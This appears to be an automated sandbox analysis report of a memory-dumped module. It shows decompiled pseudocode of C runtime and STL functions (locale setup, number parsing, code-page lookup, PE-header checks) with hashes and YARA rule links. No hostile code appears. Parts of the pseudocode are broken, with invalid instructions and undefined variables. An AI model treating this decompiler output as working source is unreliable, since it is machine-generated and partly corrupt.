C-Code - Quality: 87%

			E6DDB18A0(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t12;
				void* _t16;
				intOrPtr* _t28;
				intOrPtr* _t30;
				void* _t31;

				E6DDF00AC(0x6de37d45, __ebx, __edi, __esi, 0x34);
				_t28 =  *((intOrPtr*)(_t31 + 8));
				if(_t28 != 0) {
					_t33 =  *_t28;
					if( *_t28 == 0) {
						_t30 = E6DDEF8B6(__edx, __esi, _t33);
						 *((intOrPtr*)(_t31 + 8)) = _t30;
						 *(_t31 - 4) =  *(_t31 - 4) & 0x00000000;
						_t16 = E6DDB1450(__ebx, _t31 - 0x40, __edx, _t28, _t30, E6DDB1703( *((intOrPtr*)(_t31 + 0xc))), 0x44);
						 *(_t30 + 4) =  *(_t30 + 4) & 0x00000000;
						 *_t30 = 0x6de3a9c0;
						E6DDB1928(_t30, _t16);
						 *_t28 = _t30;
						E6DDB14CE(_t31 - 0x40);
					}
				}
				_t12 = 2;
				return E6DDF0075(_t12);
			}

0x6ddb18a7
0x6ddb18ac
0x6ddb18b1
0x6ddb18b3
0x6ddb18b6
0x6ddb18bf
0x6ddb18c2
0x6ddb18c8
0x6ddb18d5
0x6ddb18da
0x6ddb18e1
0x6ddb18e7
0x6ddb18ef
0x6ddb18f1
0x6ddb18f1
0x6ddb18b6
0x6ddb18f8
0x6ddb18fe

APIs

__EH_prolog3.LIBCMT ref: 6DDB18A7
std::_Locinfo::_Locinfo.LIBCPMT ref: 6DDB18D5

Part of subcall function 6DDB1450: __EH_prolog3.LIBCMT ref: 6DDB1457
Part of subcall function 6DDB1450: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB1464
Part of subcall function 6DDB1450: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6DDB14A1

ctype.LIBCPMT ref: 6DDB18E7

Part of subcall function 6DDB1928: __Getctype.LIBCPMT ref: 6DDB1937
Part of subcall function 6DDB1928: __Getcvt.LIBCPMT ref: 6DDB1949

std::_Locinfo::~_Locinfo.LIBCPMT ref: 6DDB18F1

Part of subcall function 6DDB14CE: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 6DDB14F5
Part of subcall function 6DDB14CE: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1566

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Locinfo::_$H_prolog3LocinfoLockit$GetctypeGetcvtLocinfo::~_Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_ctype
String ID:
API String ID: 1262428101-0
Opcode ID: 0d61b9e75b9106f1f0bcaaee6004a578091184f1e65c094f2d56c9316f8d6350
Instruction ID: f294c94dd56177066b8b1397d79839e155ea365726ed5745c64324f7d5e66b21
Opcode Fuzzy Hash: 0d61b9e75b9106f1f0bcaaee6004a578091184f1e65c094f2d56c9316f8d6350
Instruction Fuzzy Hash: EEF05EB5948715EBDB10BF60D445BAD77A4AF4075DF634409F30A5B280CF749A41CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDB968, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 323
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E6DDDB968(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t135;
				intOrPtr* _t136;
				intOrPtr* _t141;
				void* _t146;
				char _t152;
				signed int _t153;
				char* _t154;
				signed int _t160;
				void* _t166;
				void* _t167;
				char* _t173;
				void* _t174;
				void* _t175;
				void* _t185;
				intOrPtr _t186;
				intOrPtr _t192;
				intOrPtr _t198;
				char* _t199;
				intOrPtr _t213;
				char _t224;
				intOrPtr* _t235;
				signed int _t236;
				signed int _t237;
				intOrPtr _t238;
				signed int _t242;
				signed int _t243;
				char* _t247;
				signed int _t249;
				signed int _t251;
				void* _t252;
				void* _t253;

				_t234 = __edx;
				E6DDF00E0(0x6de386b8, __ebx, __edi, __esi, 0x70);
				_t198 =  *((intOrPtr*)(_t252 + 0x10));
				 *((intOrPtr*)(_t252 - 0x78)) =  *((intOrPtr*)(_t252 + 0xc));
				 *((intOrPtr*)(_t252 - 0x70)) =  *((intOrPtr*)(_t252 + 0x14));
				_t135 =  *(_t252 + 0x1c);
				 *(_t252 - 0x68) = _t135;
				_t136 = E6DDDA2F1(_t198, __edx, __edi, __esi, __eflags);
				_t240 = _t136;
				_t245 =  *((intOrPtr*)( *_t136 + 0x14));
				 *0x6de3a26c(_t252 - 0x5c, _t135);
				 *((intOrPtr*)( *((intOrPtr*)( *_t136 + 0x14))))();
				 *(_t252 - 4) =  *(_t252 - 4) & 0x00000000;
				_t255 =  *((intOrPtr*)(_t252 - 0x4c));
				if( *((intOrPtr*)(_t252 - 0x4c)) != 0) {
					 *((char*)(_t252 - 0x5e)) = E6DDDDA49(_t240);
				} else {
					 *((char*)(_t252 - 0x5e)) = 0;
				}
				_t141 = E6DDDA0FF(_t198, _t234, _t240, _t245, _t255);
				 *0x6de3a26c("0123456789ABCDEFabcdef-+Xx", 0x6de3ba77, _t252 - 0x2c,  *(_t252 - 0x68));
				 *((intOrPtr*)( *((intOrPtr*)( *_t141 + 0x1c))))();
				_t247 =  *((intOrPtr*)(_t252 - 0x78));
				 *((intOrPtr*)(_t252 - 0x6c)) = _t247;
				_t146 = E6DDDD7A6(_t198,  *((intOrPtr*)(_t252 - 0x70)));
				if(_t146 != 0) {
					L13:
					_t249 =  *(_t252 + 0x18) & 0x00000e00;
					_t242 = 0xa;
					 *(_t252 - 0x68) = _t242;
					if(_t249 != 0x400) {
						__eflags = _t249 - 0x800;
						if(_t249 != 0x800) {
							asm("sbb esi, esi");
							_t251 =  ~_t249 & _t242;
							__eflags = _t251;
							L19:
							 *((char*)(_t252 - 0x5d)) = 0;
							 *((char*)(_t252 - 0x74)) = 0;
							 *((char*)(_t252 - 0x5f)) = 0;
							E6DDDD7A6(_t198,  *((intOrPtr*)(_t252 - 0x70)));
							if(0 != 0) {
								L35:
								__eflags = _t251;
								if(_t251 == 0) {
									L38:
									 *(_t252 - 0x34) =  *(_t252 - 0x34) & 0x00000000;
									 *((intOrPtr*)(_t252 - 0x30)) = 0xf;
									 *(_t252 - 0x44) = 0;
									E6DDD6BD5(_t252 - 0x44, 1,  *((intOrPtr*)(_t252 - 0x74)));
									 *(_t252 - 4) = 1;
									_t243 = 0;
									 *((intOrPtr*)(_t252 - 0x7c)) =  *((intOrPtr*)(_t252 - 0x78)) + 0x1f;
									_t152 = E6DDDD7A6(_t198,  *((intOrPtr*)(_t252 - 0x70)));
									if(_t152 != 0) {
										_t213 =  *((intOrPtr*)(_t252 - 0x30));
										_t153 =  *(_t252 - 0x44);
										L71:
										_t199 =  *((intOrPtr*)(_t252 - 0x5d));
										L72:
										_t235 = _t252 - 0x5c;
										if( *((intOrPtr*)(_t252 - 0x48)) >= 0x10) {
											_t235 =  *((intOrPtr*)(_t252 - 0x5c));
										}
										if(_t199 == 0) {
											L89:
											_t154 =  *((intOrPtr*)(_t252 - 0x78));
											goto L90;
										} else {
											while(_t243 != 0) {
												_t199 =  *_t235;
												if(_t199 == 0x7f) {
													break;
												}
												_t243 = _t243 - 1;
												if(_t243 == 0) {
													L81:
													if(_t243 != 0) {
														L85:
														_t199 = _t235 + 1;
														if( *_t199 > 0) {
															_t235 = _t199;
														}
														continue;
													}
													 *(_t252 - 0x68) = _t252 - 0x44;
													if( *((intOrPtr*)(_t252 - 0x30)) >= 0x10) {
														 *(_t252 - 0x68) = _t153;
													}
													_t213 =  *((intOrPtr*)(_t252 - 0x30));
													if(_t199 <  *( *(_t252 - 0x68))) {
														goto L89;
													} else {
														goto L85;
													}
												}
												 *(_t252 - 0x68) = _t252 - 0x44;
												_t160 =  *(_t252 - 0x44);
												if(_t213 >= 0x10) {
													_t213 =  *((intOrPtr*)(_t252 - 0x30));
													 *(_t252 - 0x68) = _t160;
												}
												_t153 =  *(_t252 - 0x44);
												if(_t199 !=  *((intOrPtr*)( *(_t252 - 0x68) + _t243))) {
													goto L89;
												} else {
													goto L81;
												}
											}
											__eflags =  *((char*)(_t252 - 0x5f));
											_t154 =  *((intOrPtr*)(_t252 - 0x6c));
											if( *((char*)(_t252 - 0x5f)) == 0) {
												 *_t154 = 0x30;
												_t154 = _t154 + 1;
											}
											L90:
											 *_t154 = 0;
											E6DDD2B76(_t252 - 0x44);
											E6DDD2B76(_t252 - 0x5c);
											return E6DDF008A(_t251, _t199, _t243, _t251);
										}
									}
									 *((char*)(_t252 - 0x74)) = _t152;
									do {
										if( *((char*)(_t198 + 4)) == 0) {
											E6DDDC59E(_t198);
										}
										_push( *((intOrPtr*)(_t252 - 0x74)));
										 *((char*)(_t252 - 0x64)) =  *((intOrPtr*)(_t198 + 5));
										_t166 = E6DDD9DF2(_t252 - 0x2c, _t252 - 0x12, _t252 - 0x64);
										_t253 = _t253 + 0x10;
										_t167 = _t166 - _t252 - 0x2c;
										if(_t167 >=  *(_t252 - 0x68)) {
											_t213 =  *((intOrPtr*)(_t252 - 0x30));
											_t236 = _t252 - 0x44;
											_t153 =  *(_t252 - 0x44);
											__eflags = _t213 - 0x10;
											if(_t213 >= 0x10) {
												_t236 = _t153;
											}
											__eflags =  *((char*)(_t236 + _t243));
											if( *((char*)(_t236 + _t243)) == 0) {
												L64:
												if(_t243 == 0) {
													goto L71;
												}
												_t237 = _t252 - 0x44;
												if(_t213 >= 0x10) {
													_t237 = _t153;
												}
												if( *((char*)(_t237 + _t243)) <= 0) {
													_t199 = 0;
													goto L72;
												} else {
													_t243 = _t243 + 1;
													goto L71;
												}
											} else {
												__eflags =  *((char*)(_t252 - 0x5e));
												if( *((char*)(_t252 - 0x5e)) == 0) {
													goto L64;
												}
												__eflags =  *((char*)(_t198 + 4));
												if( *((char*)(_t198 + 4)) != 0) {
													_t238 =  *((intOrPtr*)(_t252 - 0x64));
												} else {
													E6DDDC59E(_t198);
													_t238 =  *((intOrPtr*)(_t198 + 5));
													_t213 =  *((intOrPtr*)(_t252 - 0x30));
													_t153 =  *(_t252 - 0x44);
												}
												__eflags = _t238 -  *((intOrPtr*)(_t252 - 0x5e));
												if(_t238 !=  *((intOrPtr*)(_t252 - 0x5e))) {
													goto L64;
												} else {
													E6DDD86F2(_t252 - 0x44, 0);
													_t243 = _t243 + 1;
													__eflags = _t243;
													goto L62;
												}
											}
										} else {
											_t224 =  *((intOrPtr*)(_t167 + "0123456789ABCDEFabcdef-+Xx"));
											_t173 =  *((intOrPtr*)(_t252 - 0x6c));
											 *_t173 = _t224;
											if( *((char*)(_t252 - 0x5f)) != 0 || _t224 != 0x30) {
												if(_t173 <  *((intOrPtr*)(_t252 - 0x7c))) {
													 *((char*)(_t252 - 0x5f)) = 1;
													 *((intOrPtr*)(_t252 - 0x6c)) = _t173 + 1;
												}
											}
											_t174 = _t252 - 0x44;
											 *((char*)(_t252 - 0x5d)) = 1;
											if( *((intOrPtr*)(_t252 - 0x30)) >= 0x10) {
												_t174 =  *(_t252 - 0x44);
											}
											if( *((char*)(_t174 + _t243)) != 0x7f) {
												_t175 = _t252 - 0x44;
												if( *((intOrPtr*)(_t252 - 0x30)) >= 0x10) {
													_t175 =  *(_t252 - 0x44);
												}
												 *((char*)(_t175 + _t243)) =  *((char*)(_t175 + _t243)) + 1;
											}
										}
										L62:
										E6DDDBD8B(_t198);
									} while (E6DDDD7A6(_t198,  *((intOrPtr*)(_t252 - 0x70))) == 0);
									_t213 =  *((intOrPtr*)(_t252 - 0x30));
									_t153 =  *(_t252 - 0x44);
									goto L64;
								}
								L36:
								__eflags = _t251 - _t242;
								if(_t251 == _t242) {
									goto L38;
								}
								L37:
								 *(_t252 - 0x68) = ((0 | _t251 != 0x00000008) - 0x00000001 & 0xfffffff2) + 0x16;
								goto L38;
							}
							if( *((intOrPtr*)(_t198 + 4)) == 0) {
								E6DDDC59E(_t198);
							}
							if( *((intOrPtr*)(_t198 + 5)) !=  *((intOrPtr*)(_t252 - 0x2c))) {
								goto L35;
							} else {
								 *((char*)(_t252 - 0x5d)) = 1;
								 *((char*)(_t252 - 0x74)) = 1;
								E6DDDBD8B(_t198);
								_t185 = E6DDDD7A6(_t198,  *((intOrPtr*)(_t252 - 0x70)));
								if(1 != 0) {
									L33:
									__eflags = _t251;
									if(_t251 != 0) {
										goto L36;
									}
									_t251 = 8;
									goto L35;
								}
								if( *((intOrPtr*)(_t198 + 4)) == _t185) {
									E6DDDC59E(_t198);
								}
								_t186 =  *((intOrPtr*)(_t198 + 5));
								if(_t186 ==  *((intOrPtr*)(_t252 - 0x13))) {
									L30:
									if(_t251 == 0 || _t251 == 0x10) {
										_t251 = 0x10;
										 *((char*)(_t252 - 0x5d)) = 0;
										 *((char*)(_t252 - 0x74)) = 0;
										E6DDDBD8B(_t198);
										goto L37;
									} else {
										goto L33;
									}
								} else {
									if( *((char*)(_t198 + 4)) == 0) {
										E6DDDC59E(_t198);
										_t186 =  *((intOrPtr*)(_t198 + 5));
									}
									if(_t186 !=  *((intOrPtr*)(_t252 - 0x14))) {
										goto L33;
									} else {
										goto L30;
									}
								}
							}
						}
						_push(0x10);
						L17:
						_pop(_t251);
						goto L19;
					}
					_push(8);
					goto L17;
				} else {
					if( *((intOrPtr*)(_t198 + 4)) == _t146) {
						E6DDDC59E(_t198);
					}
					_t192 =  *((intOrPtr*)(_t198 + 5));
					if(_t192 !=  *((intOrPtr*)(_t252 - 0x15))) {
						__eflags =  *((char*)(_t198 + 4));
						if( *((char*)(_t198 + 4)) == 0) {
							E6DDDC59E(_t198);
							_t192 =  *((intOrPtr*)(_t198 + 5));
						}
						__eflags = _t192 -  *((intOrPtr*)(_t252 - 0x16));
						if(_t192 !=  *((intOrPtr*)(_t252 - 0x16))) {
							goto L13;
						} else {
							 *_t247 = 0x2d;
							goto L12;
						}
					} else {
						 *_t247 = 0x2b;
						L12:
						 *((intOrPtr*)(_t252 - 0x6c)) = _t247 + 1;
						E6DDDBD8B(_t198);
						goto L13;
					}
				}
			}

APIs

__EH_prolog3_GS.LIBCMT ref: 6DDDB96F

Part of subcall function 6DDDA2F1: __EH_prolog3.LIBCMT ref: 6DDDA2F8
Part of subcall function 6DDDA2F1: std::_Lockit::_Lockit.LIBCPMT ref: 6DDDA302
Part of subcall function 6DDDA2F1: int.LIBCPMT ref: 6DDDA319
Part of subcall function 6DDDA2F1: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDA373

_Find_unchecked1.LIBCPMT ref: 6DDDBB80

Strings

0123456789ABCDEFabcdef-+Xx, xrefs: 6DDDB9D7

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: Lockitstd::_$Find_unchecked1H_prolog3H_prolog3_Lockit::_Lockit::~_
String ID: 0123456789ABCDEFabcdef-+Xx
API String ID: 1853221402-2799312399
Opcode ID: 5e8844bfe12fb4a48cb16b11f97b3c23bd2c812ff56f61fcc1f73d305a295921
Instruction ID: 59fe766d3428c9f0ed1ee0a4be10d949a74bfeea25148cf71f12dbd86d77a438
Opcode Fuzzy Hash: 5e8844bfe12fb4a48cb16b11f97b3c23bd2c812ff56f61fcc1f73d305a295921
Instruction Fuzzy Hash: 2FC19130D08289CEDF52EFB8C890BEDBBB1AF45308F165099E4956B287DB709945CB61

Uniqueness

Uniqueness Score: -1.00%

Function 6DE160ED, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 6DE1617D

Strings

pow, xrefs: 6DE16155, 6DE16172

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 4aaa1e528f77585ff62479aad81314563eab47cd08ec6373f1b6e551eb697328
Instruction ID: 4c618ec036994b880903427c504d54798fdaca35c0edc814361042cc57fea77b
Opcode Fuzzy Hash: 4aaa1e528f77585ff62479aad81314563eab47cd08ec6373f1b6e551eb697328
Instruction Fuzzy Hash: DE515371F1D20386DB067B28CD0036A3BF4AB4174AF308D5CE4A992399EF7584C6CA96

Uniqueness

Uniqueness Score: -1.00%

Function 6DE2DBAF, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E6DE2DBAF(void* __ecx, signed int _a4, intOrPtr _a8) {
				int _v8;
				int _t15;
				int _t16;
				signed int _t17;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_push(__ecx);
				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					_t15 = E6DE24323(_t23, __eflags, _a8 + 0x250, 0x20001004,  &_v8, 2);
					__eflags = _t15;
					if(_t15 != 0) {
						_t16 = _v8;
						__eflags = _t16;
						if(_t16 == 0) {
							_t16 = GetACP();
						}
						L25:
						return _t16;
					}
					L22:
					_t16 = 0;
					goto L25;
				}
				_t17 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = 0x6de42f08;
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t17;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = 0x6de42f10;
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								_t49 = _t17;
								if(_t17 != 0) {
									_t16 = E6DE1BF09(_t23, _t23);
									goto L25;
								}
								if(E6DE24323(_t23, _t49, _a8 + 0x250, 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t16 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t17 = _t17 | 0x00000001;
						__eflags = _t17;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				__eflags = _t26;
				goto L9;
			}

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,6DE2DE50,?,00000050,?,?,?,?,?), ref: 6DE2DC8A

Strings

ACP, xrefs: 6DE2DBCD
OCP, xrefs: 6DE2DC03

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: 97abedab3c99ed6679d1a9ec7a61216f9cb5d4ff21493e2eb69beba77d3a1d13
Instruction ID: d1e9d7ad9d66f59e838dbbca647a725537e83a1a93f0a3517ccd16a758c1e891
Opcode Fuzzy Hash: 97abedab3c99ed6679d1a9ec7a61216f9cb5d4ff21493e2eb69beba77d3a1d13
Instruction Fuzzy Hash: 2521C76AA48106A6E714CE14CD02BA773AAAFD4B68F728424EB45E7304EF72D94183D0

Uniqueness

Uniqueness Score: -1.00%

Function 6DDEFAE9, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E6DDEFAE9(void* __ebx, void* __edx, signed int _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t19;
				signed int _t20;
				signed int _t23;
				signed int _t24;
				signed int _t25;
				signed int _t26;
				signed int _t30;
				intOrPtr _t31;
				signed int _t34;
				void* _t49;
				signed int _t55;

				if( *0x6de96e51 == 0) {
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 == 0) {
						L4:
						_t19 = E6DDF079B();
						__eflags = _t19;
						if(_t19 == 0) {
							L9:
							_t20 =  *0x6de9506c; // 0x657f4f7b
							_push(_t49);
							_push(0x20);
							asm("ror eax, cl");
							_t23 = (_t20 & 0x0000001f | 0xffffffff) ^  *0x6de9506c;
							__eflags = _t23;
							_v16 = _t23;
							_v12 = _t23;
							_v8 = _t23;
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_v16 = _t23;
							_v12 = _t23;
							_v8 = _t23;
							asm("movsd");
							asm("movsd");
							asm("movsd");
							goto L10;
						} else {
							__eflags = _t55;
							if(_t55 != 0) {
								goto L9;
							} else {
								_t25 = E6DE1A8CA(_t19, 0x6de96e54);
								__eflags = _t25;
								if(_t25 != 0) {
									L8:
									_t24 = 0;
								} else {
									_t26 = E6DE1A8CA(_t25, 0x6de96e60);
									__eflags = _t26;
									if(_t26 == 0) {
										L10:
										 *0x6de96e51 = 1;
										_t24 = 1;
									} else {
										goto L8;
									}
								}
							}
						}
						return _t24;
					} else {
						__eflags = _t55 - 1;
						if(_t55 != 1) {
							E6DDF07A7(__edx, _t49, _t55, 5);
							asm("int3");
							E6DDF0990(__ebx, _t49, 0x6de92780, 8);
							_v8 = _v8 & 0x00000000;
							__eflags =  *0x6ddb0000 - 0x5a4d; // 0x5a4d
							if(__eflags != 0) {
								L19:
								_v8 = 0xfffffffe;
								_t30 = 0;
								__eflags = 0;
							} else {
								_t31 =  *0x6ddb003c; // 0x100
								__eflags =  *((intOrPtr*)(_t31 + 0x6ddb0000)) - 0x4550;
								if( *((intOrPtr*)(_t31 + 0x6ddb0000)) != 0x4550) {
									goto L19;
								} else {
									__eflags =  *((intOrPtr*)(_t31 + 0x6ddb0018)) - 0x10b;
									if( *((intOrPtr*)(_t31 + 0x6ddb0018)) != 0x10b) {
										goto L19;
									} else {
										_t34 = E6DDEF931(0x6ddb0000, _a4 - 0x6ddb0000);
										__eflags = _t34;
										if(_t34 == 0) {
											goto L19;
										} else {
											__eflags =  *(_t34 + 0x24);
											if( *(_t34 + 0x24) < 0) {
												goto L19;
											} else {
												_v8 = 0xfffffffe;
												_t30 = 1;
											}
										}
									}
								}
							}
							 *[fs:0x0] = _v20;
							return _t30;
						} else {
							goto L4;
						}
					}
				} else {
					return 1;
				}
			}

Strings

Tnm, xrefs: 6DDEFB44
`nm, xrefs: 6DDEFB65

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: Tnm$`nm
API String ID: 0-161697708
Opcode ID: 21f7894fcba99069b7eefa7634b426eda3ebc13a6d727f1769efbe79bbe5e0a1
Instruction ID: e10edf998502fe9cf1a2bd5a145b442c75ffdda1d99aa5e2b94bbceb1c3a4de4
Opcode Fuzzy Hash: 21f7894fcba99069b7eefa7634b426eda3ebc13a6d727f1769efbe79bbe5e0a1
Instruction Fuzzy Hash: 4211A732D06615D6DF01EF78D9007EE77E55B02768F11415BEA10EF181D7B1D6058BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDD3751, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E6DDD3751(void* __ebx, signed int* __ecx, signed char* __edi, void* __esi) {
				signed int _t18;
				intOrPtr* _t26;
				signed int _t29;
				signed char _t33;
				void* _t35;
				signed char _t40;
				void* _t41;
				intOrPtr* _t42;

				E6DDF00E0(0x6de38012, __ebx, __edi, __esi, 0x38);
				_t40 = __ecx;
				_t33 =  *((intOrPtr*)(_t41 + 8));
				_t18 = _t33 & 0x000000ff;
				if(_t18 > 8) {
					 *__ecx =  *__ecx & 0x00000000;
					__eflags = _t33;
					if(_t33 != 0) {
						goto L4;
					} else {
						E6DDD1F9A(_t41 - 0x28, "961c151d2e87f2686a955a9be24d316f1362bf21 3.9.1");
						_t7 = _t41 - 4;
						 *_t7 =  *(_t41 - 4) & 0x00000000;
						__eflags =  *_t7;
						_t35 = _t41 - 0x44;
						E6DDD0C7C(__ebx, _t35, __edi, _t40,  *_t7);
						 *_t42 = 0x6de93430;
						E6DDF3D74(_t41 - 0x44, _t41 - 0x28);
						asm("scasb");
						asm("aaa");
						asm("invalid");
						if(__eflags >= 0) {
							_t26 =  *((intOrPtr*)(_t42 + 4));
							 *_t26 =  *((intOrPtr*)(_t35 + 4));
							return _t26;
						} else {
							asm("invalid");
							 *__edi =  *__edi ^ 0x000000dd;
							asm("insd");
							 *__edi = _t40;
							asm("invalid");
							asm("aaa");
							asm("invalid");
							asm("pushfd");
							asm("aaa");
							asm("invalid");
							asm("pushfd");
							asm("aaa");
							asm("invalid");
							asm("movsd");
							asm("aaa");
							asm("invalid");
							asm("aaa");
							asm("invalid");
							_t29 =  *((intOrPtr*)(_t35 + 4)) - 0x10;
							__eflags = _t29;
							return _t29;
						}
					}
				} else {
					switch( *((intOrPtr*)(_t18 * 4 +  &M6DDD37E9))) {
						case 0:
							 *__esi =  *__esi & 0x00000000;
							goto L4;
						case 1:
							_t30 = E6DDD4B1C(__ebx, __edi, __ecx, _t43);
							goto L3;
						case 2:
							__eax = E6DDD4B64(__eflags);
							goto L3;
						case 3:
							__eax = E6DDD4B87(__ebx, __edi, __esi, __eflags);
							goto L3;
						case 4:
							 *__esi = 0;
							goto L4;
						case 5:
							 *__esi =  *__esi & 0x00000000;
							__esi[1] = __esi[1] & 0x00000000;
							goto L4;
						case 6:
							asm("xorps xmm0, xmm0");
							asm("movsd [esi], xmm0");
							goto L4;
						case 7:
							__eax = E6DDD4BCF(__eflags);
							L3:
							 *_t40 = _t30;
							L4:
							return E6DDF008A(_t40, _t31, _t37, _t40);
							goto L16;
					}
				}
				L16:
			}

APIs

__EH_prolog3_GS.LIBCMT ref: 6DDD3758
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDD37E2

Strings

961c151d2e87f2686a955a9be24d316f1362bf21 3.9.1, xrefs: 6DDD37BA

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: Exception@8H_prolog3_Throw
String ID: 961c151d2e87f2686a955a9be24d316f1362bf21 3.9.1
API String ID: 2985221223-1287915644
Opcode ID: 9bd5bdbbfa353bde0ced89aa7b22e1d2056b119dc7530a5877c9ffff273a633d
Instruction ID: 12b33f3c075e8807ee77d3abe2eaef285a18a6daae0c2c21b8defe568f68e078
Opcode Fuzzy Hash: 9bd5bdbbfa353bde0ced89aa7b22e1d2056b119dc7530a5877c9ffff273a633d
Instruction Fuzzy Hash: D0016DF286CA05FBDF81BF64C9417ACB2E4BF26366F22851AF1C0A6040DBB41585C762

Uniqueness

Uniqueness Score: -1.00%

Function 6DE24B79, Relevance: 5.1, APIs: 4, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 100%

